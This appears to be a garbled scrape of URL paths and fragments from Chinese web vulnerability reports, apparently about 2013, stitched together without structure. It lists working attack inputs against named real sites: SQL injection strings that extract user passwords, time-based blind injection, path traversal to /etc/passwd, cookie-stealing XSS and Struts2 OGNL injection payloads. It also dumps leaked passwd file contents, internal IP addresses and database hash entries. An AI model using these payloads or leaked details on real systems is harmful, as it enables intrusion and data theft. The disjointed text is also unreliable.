/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName= /Student/My/Login.aspx?ReturnURL=http%3a%2f%2fcampus.nokia.com.cn%2fStudent%2fMy%2fapply.aspx /res/js/dev/util_libs/jPlayer/Jplayer.swf /res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=alert(1) /res/js/dev/util_libs/jPlayer/Jplayer.swf?id= /fjgl%5CfjglCRE259891349927902199.jsp?sort=1&file= / h.lesuke.com/contract_downloadEbook.do?displayName=1797f10f5513435f81432cd174cdff6e.php&ebookUrl=/../../../../../etc/passwd /profile/order/filter/single/id/9165315 /toexcel_PrintDialog.aspx?kc=此处填写课程代码&tab=jxrwb_lsb&psb=30&qzb=0&qmb=70&syb=0&cjxn=2012-2013&cjxq=1&kclx=必修课 /ajaxv2/user/addRelation /aj/trialmember/uploadurltext /login.asp language=cn /play/ad0761084a7302768e9939f3?pn=1&rn=50 /spgbid/homeAction/searchAction.action?search=search&msg= /relationship/bulkfollow.php?language=zh_cn&uids=2074219121&wide=1&color=C2D9F2,FFFFFF,0082CB,666666&showtitle=1&showinfo=1&sense=0&verified=1&count=5&refer='+encodeURIComponent(location.href)+'&dpc=1 /HTML/News/Tender.aspx?MenuID=5 /webmaster/aspx.aspx /xz/student_list.asp /MemberInfo/address/act/add_edit/address_id/1373489 /MemberInfo/address/act/del_address/address_id/1373489 /MemberInfo/info/type/3/act/sel/roleid/9056 /MemberInfo/info/type/3/act/del/roleid/9056 /xz/student_list.asp title=%'&age=0 /details.asp /register.action?agencyId=42302 /cgi-bin/CommNews/news_click.cgi?iPdName=1&fid=36886-sleep(5) /cgi-bin/CommNews/news_click.cgi?iPdName=1&fid=36886-sleep(10) /cgi-bin/CommNews/news_click.cgi?iPdName=1&fid=36886-sleep(15) /pg/pg_list.asp?action=list /pg/pg_list.asp?action=list?bbyz=aaa /home/backup/multibak_20111023150416_7.sql /home/backup/ /openinfo/gongDianSubUnit.action?unitid=9783&catalogid=13943 /toIndexHomeUsers.action /portal/event/61 /php_cgi/lol_club/pop_short.php?type=12&page=1&rd=0.06736766834528884¶=a%3E%3E%3E%3Cimg%20src=1%20onerror=alert%281%29%3E%3C%3C%3C /badoo/opinion/gbolwl /webcrm/jfdj/productinfo.aspx?productcode=01100201058%27 
/space-693256254-do-blog-id-1140804.html 5px /4310VB?'+Math.random();document.body.appendChild(s) /82248039/3 30px;overflow-y:auto;width:100px #t /friend.php?w=d /?member-数字编号-reply-message.html /?member-9-reply-message.html /?member- / /system/manager/terminalLogin.do /315/tousu/ /webhosting/cp/f10_sqltools_done.php /webhosting/cp/f10_sqltools_done.php /webmaster/admin.aspx /qipu/qfgo/show.asp?qipuid=27157%22%20onmouseover%3dprompt(923700)%20bad%3d%22 /qipu/qipumain.asp?Do=Search&P1=-1'%20or%2049%20%3d%20'49 /qipu/qipumain.asp?Do=Search&P1='%2b /test.asp /mail/resetPassword.action?actionType=index)。 /?member-1794-modifyReceiver.html /?member-1794-modifyReceiver.html /?member-1794-delRec.html /?member-1794-2-setDefault.html /shop/member!passwordRecover.action /upExpert.php?expert=2 /upExpert.php?expert=2 /就会造成异常,目测是因为用此数据构造查询请求导致的 /a.php /abc/robots.txt /phpmyadmin/6.php /report/message/5367000 /safe/mod_pwd?kcode=aaaaaaaaaaaaaaaaaaa&tcode=bbbbbbbbbb /tcmiddleapi/hotel/orderhandler.ashx /tcmiddleapi/hotel/orderhandler.ashx /MobileAPI/flight/orderhandler.ashx /MobileAPI/flight/orderhandler.ashx /MobileAPI/general/contactHandler.ashx /MobileAPI/flight/orderhandler.ashx /MobileAPI/General/ReciverHandler.ashx /phpmywind/admin/) /phpmywind/admin/),轻轻一按回车,全自动登录,无需帐号密码。 /ruwei_vote.php?id=1 /wxcs/mains.html?citycode=440500注册后可使用电费查询服务,只要绑定就可以轻松获得用户信息,而且供电局在连接移动平台时未经用户授权。其移动无线城市也未尽到审核用户是否真实,如户号增加姓名来判断是较为安全,仅凭户号即可轻松获得电费信息的邮件存在较大的安全隐患。 /bingli/bldelete/ID.htm?_=1359187495833 /calisnew/allacad.asp?id=m /pay/topay.net?IDAAction=5437730 /pay/topay.net?IDAAction=5437730 /admin/login.php /editor/admin/main.php /editor/admin/default.php /user/sendpassword?type=email&input=密码重置链接接收邮箱&userId=9位数字用户ID /user/sendpassword?type=email&input=xxxxx@qq.com&userId=XX@sina.com的用户ID /2house/shop.php?id=11 /home/?uid=1480 /index.php?m=admin /androidmember/getpassbytel/login_name/{18980706050}/type/tel /androidmember/getpassbytelcheck/check_code/{594076}/member_id/{2672454 
/androidmember/passreset/code/{00168745b803896429ae24e66485aa14}/id/{2672454}/type/tel/pass/{112233 /login.do /ckfinder/ckfinder.html expression(alert(1);) expression(alert(document.cookie)) /test.swf /index.php?m=content&c=vote&a=desc&vid=12 /index.php?m=content&c=vote&a=desc&vid=-12 /admin/action/system/accountuser/login.action /admin/ewebeditor/admin/login.jsp /searchTest.jsp /news_detail.php?id=581%20aNd%201=2%20unIon%20all%20selEct%20us_username,2,us_password%20from%20tbl_user /login.aspx /login.aspx /login.aspx /login.aspx /checkoutCounter/game/game.jsp?gameName=1+and+left /checkoutCounter/game/game.jsp?gameName=1+and+length /checkoutCounter/game/game.jsp?gameName=1+and+left /checkoutCounter/game/game.jsp?gameName=1+and+left /index.php?act=user.getpwd&type=1 /console/user/[userId /player/local.html?c=localstorage&h=www.tmxk.org?&_=20121206&k=volume%22%3E%3Cbbb%3E /111.txt /login/toLoginPage.do /zjsong.php?username=任意用户名 /index.asp?a=1&id=897 /lybofang.asp?id=1 /pabj.asp?id=1 /qxkp_view.asp?id=1 /shbofang.asp?id=1 /search?q=%B2%B9%B7%A2%C6%B1&initiative_id=staobaoz_20130116 /item.htm?id=16461257903&ali_refid=a3_420434_1006:1104808423:6:%B1%A8%CF%FA%B7%A2%C6%B1:3aa667d8372808ab14181f9e2b23c0d8&ali_trackid=1_3aa667d8372808ab14181f9e2b23c0d8 /item.htm?id=16992886965&ali_refid=a3_420434_1006:1104868579:6:%B1%A8%CF%FA%B7%A2%C6%B1:f8946bfbb8eca6d45a6c19a287142896&ali_trackid=1_f8946bfbb8eca6d45a6c19a287142896 /item.htm?id=20843036185&ali_refid=a3_420434_1006:1104770825:6:%B1%A8%CF%FA%B7%A2%C6%B1:027b1e487cb1aedfa4e580f324721f6e&ali_trackid=1_027b1e487cb1aedfa4e580f324721f6e /item.htm?id=16826721256&ali_refid=a3_420434_1006:1104990867:6:%B1%A8%CF%FA%B7%A2%C6%B1:d8c9bf492bc073fb126b57aa16f8e16b&ali_trackid=1_d8c9bf492bc073fb126b57aa16f8e16b /item.htm?id=18346567364&ali_refid=a3_420434_1006:1104631327:6::4a3ca9820fd62187549010dc647c655d&ali_trackid=1_4a3ca9820fd62187549010dc647c655d /item.htm?spm=a230r.1.10.74.6HVNMm&id=16298694544 
/item.htm?id=16826721256&ali_refid=a3_420434_1006:1104990867:6:%B1%A8%CF%FA%B7%A2%C6%B1:d8c9bf492bc073fb126b57aa16f8e16b&ali_trackid=1_d8c9bf492bc073fb126b57aa16f8e16b /1293/?keepsession=&location=http%3A//xss.tw/Project/TestCode/pid/1293&toplocation=http%3A//xss.tw/Project/TestCode/pid/1293&cookie= xss.tw/Project/ViewCode/pid/1293&title=Xss代码测试运行 /Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3 /index.php?m=ta&id=14152418 /index.php?m=ta&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E /article!listFace.action /agentRegister.do?method=register /manager/ /admin/adminLogin.jsp /wap/login.do?uuniq=1359436782529555 /wap/findpassword/sendBandPhoneNum.do?findPasswordIndex=1&uuniq=1359436785443054 /topic/show/521 /simis/ECPortal/NewDL100/OnlineOpenFlow/OnlineOpenFlow_CRM_UnLogin.aspx?source=newproductshowhall&PrdType=4&productcode=864&eccode=&orderway=1&returnUrl=http%3a%2f%2fgd.10086.cn%2fsimis%2fProductHall%2fdata%2fproduct%2f667.html /index.php/product-189.html / /Ccheck_User_ND2.Asp?id=228 /swfview/html?id=311954 www.ztx.renren.com所利用的DedeCMS存在一个已经公布的SQL注入漏洞,通过注入漏洞可以获得管理员用户名、密码,连接数据库的用户等敏感信息,造成敏感信息泄露。并且发现可以在注入点通过load_file()函数读取文件内容,差不多相当于任意文件读取了。比如可以读取/etc/passwd,/etc/httpd/conf/httpd.conf等文件从而获得敏感信息。 /地址是集中监控平台管理地址。 /2012_first_tech_forum/的连接地址,于是我看了看整站,貌似貌似是html静态,不可能,于是我侥幸的在后面加了个admin,之后好玩的就发生了 www.865171.cn看看有什么,于是我来到这个www.865171.cn网站,发现是一个模版网,于是我什么都懂了,开始寻找那后台的模版(知道我为什么说是临时工做的了吧。。),之后我找到了这个模版 /plus/search.php?keyword=as&typeArr[111%3D@`\ /?action=spreadIndex&id=13 /product/bulletin/news_detail.php?ID=121 /user/resetpassword /user/sendpasswordsucc?type=mobile&username=xxxxxxx /user/confirmpassword /user/sendpasswordsucc?type=mobile&username=xxxxxxx /dopool_web/managelist.aspx,后台有个“管理员管理”菜单,点一下,所有管理员的用户名和密码都出来了,而且密码是明文的。用得到的一个管理员用户登录了后台。在后台是可以修改软件下载地址的,如果被下载的软件被替换成了恶意软件,后果很严重。此外在后台还可以修改网站的友情链接,如果把安卓网等访问量比较大的网站修改为钓鱼网站的地址,可能泄露用户的个人信息,后果也很严重。 /pay/pay.html /dopool_web/XiazaiList.aspx?PNO1= /web.zip / /images/ /myrest/order1.asp?orderid=5357217 
/website/xfPortal/XFPortalAction!index.action /static/js/patch.php?app_key=[注入点 /static/js/patch.php?app_key=1'%20and%20(1=1)%20and%20'1'='1 /static/js/patch.php?app_key=1'%20and%20(1=2)%20and%20'1'='1 /static/js/patch.php?app_key=1'%20and%20 /static/js/patch.php?app_key=1'%20and /static/js/patch.php?app_key=1'%20and%20 / /club/phone/editphone!proModifyPhone.action?phoneId=640 /whole/letter/b/p/1.html /whole/letter/b*/p/1.html /Modules/uploadForm.htm?UrlPath=/ /),鼠标无意点到“114啦浏览器入选2010华军我最喜爱的软件评选”,然后。。 /zt/2010/vote/vote.php /zt/2010/vote/config/config.php /softinfo.php?pack=/*XSS*/ /etc/passwd /400/pay/rechargeonline?body=zj18675600179%B3%E4%D6%B5%B6%D2%BB%BB%BB%FD%B7%D6&buyer_email=xiaojiong1991%40gmail.com&buyer_id=2088702688628368&exterface=create_direct_pay_by_user&is_success=T¬ify_id=RqPnCoPT3K9%252Fvwbh3I70VvLcY7qmeeu8qm3TTjGn%252FBkh%252BERX1f3Xl9bBtbubq3ZvKD0v¬ify_time=2013-02-01+01%3A28%3A08¬ify_type=trade_status_sync&out_trade_no=906311982_1&payment_type=1&seller_email=pay%40haodf.com&seller_id=2088101708599020&subject=%B1%EA%D7%BC-%B6%A9%B5%A5%BA%C5(906311982_1)&total_fee=0.10&trade_no=2013020144984236&trade_status=TRADE_SUCCESS&sign=55fc3aad7fc0826431e71cece8731b1b&sign_type=MD5 /telpayment/showtelaccount?from=present&orderId=906312072 /News.aspx?SearchInfo=1 css.k-touch.cn/bbs/config.inc.php.bak css.k-touch.cn/phpmyadmin /system/login.aspx /admin/admin_log.asp / /EC0703.V6014.rar history.back() history.back() history.back() history.back() /survey_vote.php?survey_id=5377&question_type=radio&id=26800 /index.action inet 10.199.18.29 10.199.18.67 x:0:0:root:/root:/bin/bash x:0:0::/home/frxcard:/bin/bash /member-1300-reply-send.html /member-1311-reply-send.html /member-1322-reply-send.html /ids/cn/haier_login.jsp?returnUrl=http://www.haier.com/cn/ /ids/cn/forget_password_reset.jsp?code=******** /my/turbine/template/corcenter%2Ccompany%2Ccompany_show.html /baihe/3 /userAction.do?method=toUpdateUserInfo&typeint=1 /id5/authedId5.action /test/image2base64.php 
a=function(text){var /act/a20130121newyear/card.shtml www.lesuke.com/user/getPwdSuc.jsp /user/recaccount/xxxxxx/ /user/recaccount/19775/ /v_show/id_XNTA5ODQxMjU2.html /t0Oy9U?'+Math.random() /2013/01/07/085/13575224858054398m.png /t0Oy9U?'+Math.random() /survey_vote.php?survey_id=5377&question_type=radio&id=26800 /2010/pdf/index.asp?pdfaddr=index.asp /2010/pdf/index.asp?pdfaddr=index.asP /?controller=act&action=index&name=/../../../../../../../../../../../etc/passwd%00.html /user/ajax?mode=sentmail&uid=164000&uname=xxxxxxxx&mail=xxxxx@qq.com×tamp=1359722420037 www.zhuna.cn /api/gateway.php?bid=120216&method=search&agent_md=d98c1c10952074bf&agent_id=200605存在注入 /api/note.php?mod=login这个地方,可以用主站账号登录,判断跟主站同一个库,注出几个账号后发现判断正确 /379610694 /friend/ajaxfriendlist /pm/index/newpm/uid=379610694 /opta/live1.php?id=f155688 /m1/login.do /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /m1/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /readimage.aspx?xh=xxxxxx&bs=ckzp www.pkav.net中设置xss字段到pkav.net域 www.pkav.net /member-account/register.html /deal-1316.html /images/js/basic/fileloadmanager.js 
/images/js/login/loginmanagerv2.js?onlyCookie=1&needMaskDiv=1&needReloadPage=1 /images/js/jquery/jquery-1.3.2.min.js /js/web201206/base.js /js/web201206/userinfo.js /js/web201206/protocity.js /js/web201206/scroll.js /web201107/js/MK.Comm.js /js/plat/xinyuecfg.js /js/plat/lotterymanager.js activityId:1906 false false / / /userCenter/orderCtrl/detail?orderId=201302044685 /userCenter/orderCtrl/detail?orderId=201302044682 /p/2045714993 xsser.me/Bqp9Ry wbuid:1673450172 xsser.me/Bqp9Ry /p/2134900096 /adult-admin/login.do /1.js /Member/SendMobileMsg.do?Sat%20Feb%2002%202013%2017%3A14%3A30%20GMT+0800&userid=1234567 /index/search /shop/OrderSuccess.aspx?OrderID= /shop/OrderSuccess.aspx?OrderID=1458 /shop/OrderSuccess.aspx?OrderID=1459 /loreg/page/tologin /.svn/entries /.svn/text-base/index.php.svn-base /inc/.svn/text-base/globalFunction.php.svn-base /LoginUser?USERNO=%27&PWD=%27 /mos/kancha/prew_order.aspx?orderid= /mos/kancha/prew_order.aspx?orderid=201003120004 /mos/kancha/prew_order.aspx?orderid=201003120003 /js/index_zs.php?alltid=0&tid=154&allnum=5&per=5 / / /rateinfo/mobile/ConditionSearchResult.aspx?currname=1 /share/download.jsp?filePath=../../../../../../etc/passwd&fileName=wind.txt x:0:0:root:/root:/bin/bash x:1:1:daemon:/usr/sbin:/bin/sh x:2:2:bin:/bin:/bin/sh x:3:3:sys:/dev:/bin/sh x:4:65534:sync:/bin:/bin/sync x:5:60:games:/usr/games:/bin/sh x:6:12:man:/var/cache/man:/bin/sh x:7:7:lp:/var/spool/lpd:/bin/sh x:8:8:mail:/var/mail:/bin/sh x:9:9:news:/var/spool/news:/bin/sh x:10:10:uucp:/var/spool/uucp:/bin/sh x:13:13:proxy:/bin:/bin/sh x:33:33:www-data:/var/www:/bin/sh x:34:34:backup:/var/backups:/bin/sh x:38:38:Mailing /var/list:/bin/sh x:39:39:ircd:/var/run/ircd:/bin/sh x:41:41:Gnats /bin/sh x:65534:65534:nobody:/nonexistent:/bin/sh x:100:101::/var/lib/libuuid:/bin/sh x:101:103::/home/syslog:/bin/false x:102:105::/var/run/dbus:/bin/false x:103:106::/nonexistent:/bin/false x:104:109::/var/lib/landscape:/bin/false x:105:65534::/var/run/sshd:/usr/sbin/nologin 
x:1000:1000:xiaohong,,,:/home/xh:/bin/bash x:106:113:ftp /bin/false x:1001:1001::/home/xiaohong:/bin/false x:1002:1002::/home/ftp1001:/bin/false x:1003:1003::/home/ftp1002:/bin/false x:1004:1004::/home/ftp1003:/bin/false x:1005:1005::/home/ftp1004:/bin/false x:1006:1006::/home/ftp1005:/bin/false x:1007:1007::/home/ftp1006:/bin/false x:1008:1008::/home/nhy:/bin/false x:107:115::/var/spool/postfix:/bin/false /rrlcs/suggest/suggest.jsp /rrlcs/admin/manageMessages.jsp?left=1 /rrlcs/admin/index2.jsp?msg=success /rrlcs/admin/side.jsp?moduleid=9 /rrlcs/admin/managegoods.jsp /rrlcs/admin/viewgoods.jsp?id=69 /code/explore/jbossas whirlwind110@live.com /上注册任意账号,然后创建图片集应用,接下来上传一个图片马 /shop/member!passwordRecover.action /app.php?do=app_add /user/canceled.asp?f=51273654&u=aa43e59168c91dbf /user/canceled.asp?f=51274571&u=aa43e59168c91dbf /login.action lh.9you.com/web_v3/bcastr.swf?bcastr_xml_url=xml/bcastr.xml alert(1) alert(1) /2013/happyGetData?att=1&uid=2074219121&mid=3541949564378375&rl=0&vt=1 http://passport.note.sdo.com/bin.zip /beijing-recommend/g0n15/%3Cscript%3Ealert%28/1/%29%3C/script%3E /hangzhou-recommend/D1g1x30n16/%3Cscript%3Ealert%28%2F1%2F%29%3C%2Fscript%3E http://222.73.12.140/SelectCity.asp http://222.73.12.188/111.rar /service.shtml /lib/ /admin.php?module=Noticeol&action=detail&nid=37 /admin.php?module=Noticeol&action=detail&nid=37 053a9bf72434f7f8:localhost 32ce979f1810450d:% 532a371916879d65:% 63e483b832b5e91a:% xiaonei_ts:38e845946c9b5163:10.22.225.110 crm_zl:0e1493ed782f704c:10.4.130.79 10.22.225.238 565491d704013245:10.22.225.20 10.6.57.60 10.30.33.56 565491d704013245:10.30.32.141 10.22.225.89 10.22.225.90 10.30.33.80 renren_sz:09d725012d72e6ab:10.30.37.22 renren_lzr:09d725012d72e6ab:10.22.227.110 27df606e7932e98c:% 658d4f1d5d32391d:10.% 565491d704013245:% x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync 
x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news:/sbin/nologin x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:81:81:System /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:34:34:Network /var/crash:/bin/bash x:28:28:NSCD /:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:66:65:tog-pegasus /var/lib/Pegasus:/sbin/nologin x:500:500:Zabbix /home/zabbix:/bin/false x:100:103:MySQL /var/lib/mysql:/bin/bash crm.imop.com/config.inc.php localhost:3306 org:3306 localhost:3306 /fckeditor/ /lib/FCKeditor/ 10086.cn/*就自动启用兼容模式的,所以只要构造一个http://127.0.0.1/www.10086.cn/aaa.html应该就能满足它的条件。 /aaa/SSSSSSSSSSS....SSSS.torrent /aaa/SSSSSSSSSSSS....SSSS www.10086.cn/ge.html处,再用火狐访问,火狐如愿崩溃。。 55like /parties/mascot/view.php?num=1 /2013/01/341.html的一个补充吧,不是所有情况都可以用防嵌入来解决点击劫持.具体看漏洞证明 link link}\r\n link}{dede:yy520 yy520 None img img}\r\n /dede:img}{dede:yy520 yy520}.jpg /admin/login.php /member/index.php /mblog/pic/20132_11_3/s_pzenz7686783935702.jpg","extraData":{"smallest":{"w":90 /mblog/pic/20132_11_3/s_pzenz7686783935702.jpg\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029","extraData":{"smallest":{"w":90 /app/enter?appid=280383 /admin/main.htm 
/registration/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) www.xxx.com/xxx.mp3 /photo_upload.do?userAgent=Mozilla/5.0%20%28Windows%20NT%205.1;%20rv:17.0%29%20Gecko/20100101%20Firefox/17.0 /person/myphoto_post?photoUrl=http%3A%2F%2Fimg4.y.duowan.com%2F1667137.jpg&_=1358839269545 /person/myphoto_post?photoUrl=http:// 0x0F /subject/tools/test.php /upload/2013/0127/1359286641_05159.jpg/.php /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and / / / / /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /user/domain_list.aspx /topicList.html?panel_id=1&logiRonId=5中发帖存在XSS,经测试可完整执行各类script,iframe。 www.zjagri.gov.cn/root.rar /cms/plus/search.php?keyword=as&typeArr[111%3D@`\ /embeded/login.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) alert(code)弹! 
d.youc.com/dede/ /onlineservice/suggest/index.htm /user/msg_read.aspx?MessageID=597884 /webmaster/exesql.aspx /uploadaction!befforeWai.action?filetype=1 /ProductDetail/index/id/2056.html /Product/lists/id/41/filter_attr/3261.0.0.0.0 /HTML/JoinUs/Resume.aspx?id=24 /JoinUs/Resume.aspx?id=24 /sys/sys_login!login.action //plus/search.php?keyword=as&typeArr[111%3D@`\ /user/piclink_xml1.aspx?page=30&ram=0.8126895087771118 /user/piclink_xml1.aspx?page='30&ram=0.8126895087771118 /phpclient/cms/register.php /myvote.asp?VoteID=11 /user/setPwd/v/101b029ae8b22a7eded7154070156a49 /user/setPwd/v/ /userservice/login/default_login.jsp /userservice/login/toLogin.action /resource/news/newslist_rpt.aspx?typecode=001%27%20%20or%201=1-- /resource/news/newslist_rpt.aspx?typecode=001%27%20%20or%201=2-- /resource/_pub/EditSrc/ImgMag/ImgMag_main.aspx /pay/card_list /e/DownSys/DownPic/index.php?down_file= /cmd.asp?act=gettburl&id=104%22%3E%3Cimg%20src=1%20onerror=alert(1);%3E cmd.asp?act=gettburl&id= /cmd.asp?act=gettburl&id=39 /cmd.asp?act=gettburl&id=15 /questionnaire/index.php?questionnaireId=2 19.0 /rent/backstage/InputFront/PhoneProcess.aspx /rent/backstage/InputFront/PhoneProcess.aspx' /status/replystatus.do?doingid=4569682743&id=330615009&htf=727&sid=--M5bfiIpcMPeAy2Ay1WcN&jyw81c&ret=stories.do%3F%26tab%3D100%26htf%3D1512%2321399938224-n-%E6%96%B0%E9%B2%9C%E4%BA%8B-n-0 /home.do?&sid=--M5bfiIpcMPeAy2Ay1WcN&shiyvy&htf=1 /newuc/user/reg /wawa/app/box/cloud.php,来到个人曲库进行添加文件夹。 /ms08078.html /sd/内,点开一个晒单的帖子 /fly/search.jsp?searchText=%22%3E%3C/form%3E%3Cimg%20src=x%20onerror=%22javascript:alert%285%29%22%3E /index.php?url=content&id=3243 /webpage/column/regist1.shtml /wawa/ /AjE5se /wawa/app/box/cloud.php?kugouid=80213056 /IndexAction.action?pageId=newsdetail&newsId=1014 /card/game.jsp?gameName=QQ&remark=&supplier=qq:HTML jingcha utf-8 fid:43460 47176b351fbb9b5e1361019044 /ser.php?username=加密后的用户&url=用户正常访问的url(弹完广告后回调,由于做得不好,没跳转过来,卡住了,至少要把劫持产品做出体验效果来啊!)&pushid=pushid 
/s?wd=221.235.37.57%3A3437 / / /?controller=myorder&action=details&id=3536 /grboss/menufeemgr.action /index.php/News/detail/id/72 /index.php/News/detail?id=72 /index.php/News/detail/id/72 /index.action /huabei/about.action /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /index.php?action=more&op=&rtype=3&stype=0&todo=ajax /z_-1%22%20or%20%2262%22%3d%2262 /z_-1%22%20or%20%2262%22%3d%22621 / / / /index.html /topic/F1/ /signinservice.asmx/GetSignInUsersSignInForList?pageIndex=1&SortType=FALSE&SortField= www.imaibo.net/index.php?act=newslist&app=investment&mod=News&newsType=1&stockId=4324 /member/login /member/login /member/login /member/login /member/login /u58/v_ODY5ODgzMTE.html /u58/v_ODY5ODgzMTE.html /show.php /question/master/FCKeditor/editor/filemanager/connectors/test.html /chart/tmp-upload-images/hfy.php /Company/zd.asp?action=9&action1=4&C_Id=13 /jsInfoList.php?game_id=136&category_id=2399&st=1&tn=10&zlNum=7&url=zq /oauth/signup-id-632861.html /oauth/signup-id-632860.html /more.asp?id=644 /topicLab/index.php?m=user&a=upload&name= /trade/servlet?Search=SX_SelectGS&RegNO=97198'%20and%20'a'='a&IntCls=9 /alipay/alipayto.php?orderid=201302201207430&subject=%E6%A0%87%E5%87%86%E8%AE%A2%E9%98%85&total_fee=198 / /app/poster /app/poster/edit/我是ID?typeId=1 /p_02368-1%22%20or%20%22107%22%3d%22107 /p_02368-1%22%20or%20%22107%22%3d%221071 / / / /jeeadmin/jeecms/index.do /trend/follow?k=此处插入任意文本&rl=1&vt=1 /trend/follow?act=recommendc&k=此处插入文本&rl=1&vt=1 /im/ChooseService.aspx?Sale=2&car=36 /sdm/plat/login.action /mcolumn/expdetail.php?mid=1100 /mcolumn/expdetail.php?mid=1100 /mcolumn/hottag.php?tid=752 /mcolumn/hottag.php?tid=752 /2013/01/341.html的一个补充吧,不是所有情况都可以用防嵌入来解决点击劫持.具体看漏洞证明 http://2012fz.huaian.com/show.php www.huaian.com的用户表: Kesion 111394,9537636 Set Set PaymentPlat=1 Set Set AccountID=RSP("AccountID") 
MD5Key=RSP("MD5Key") PayOnlineRate=KS.ChkClng(RSP("Rate")) RateByUser=KS.ChkClng(RSP("RateByUser")) Set Set Set OrderStatus=rs("status") XID=RS("ID") set set Set set RealName=rsUser("RealName") Edays=rsUser("Edays") BeginDate=rsUser("BeginDate") Set /snjyw/member.do?method=ajaxuserid&userid=hacktest /snjyw/member.do?method=ajaxuserid&userid=hacktest%27%3Ciframe%3E Set ChannelID=KS.G("ChannelID") alert(document.coookie) /public/test-book.asp?action=xiangxi&ColumnsArticleID=%7BCF883C28-CD30-408F-9DE2-ABC45D99022D%7D /cms/webpage39.htm /.svn/entries /.svn/text-base/config.php.svn-base /.svn/text-base/config.php.svn-base /.svn/entries /app/www/templates/adminMobile/tt.html /cmsAdmin/cmsAdmin.php /templates/fckeditor/ /app/www/templates/common/fckeditor/editor/fckeditor.html /news/newsid!NewsById.a?Id=1200 /getcompanyinfor.action?website1=www.gqsoso.com%27%20and%201=%271 /getcompanyinfor.action?website1=www.gqsoso.com%27%20and%202=%271 /syjoauth/rs/userpublic/resetPassword?email=邮箱账号&client_id=875.cn&key=57a24ddf32f5ad9e8187d0a529a96a47 /zh-CN/feedback.php /common/post/login.php?next=%2Fcommon%2Fpost%2Frm.php%3Fc_id%3D2%26mc_id%3D1%26id%3D1367612%26post_url%3Dhttp%253A%252F%252Fjn.ganji.com%252Ffang1%252F455961215x.htm%26nocache%3D1361285679890%26phone%3D此处为手机号码&username=%23t_174532472&sms_rm=2_1_1367612&domain=jn /1/1/gif.php /pk.php?a=list&id=28 /globalmail.cn.rar /scjt/frontVoteServlet?method=more&msgtype=4 /scjt/VoteServlet?method=vote&id=ffb644c0d433413fa3a7be42e1b6d4a6&msgtype=4 /scjt/ /fckeditor/ /webapp/hotelinfo.asp?hid=7586 /webapp/hotelinfo.asp?hid=7586 /webapp/hotelinfo.asp?hid=7586 /webapp/hotelinfo.asp?hid=7586 / /guanli/order/orderlist.asp?orderid=65918&member=gszhdy /guanli/order/orderlist.asp?orderid=65917&member=0917wwb sql.php tbl_structure.php tbl_structure.php /my/sql.php?db=ecshop&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=a9bf48954d59c98098ba16944b0b8449&table=ecs_stats&goto=tbl_structure.php /sys_admin/ 
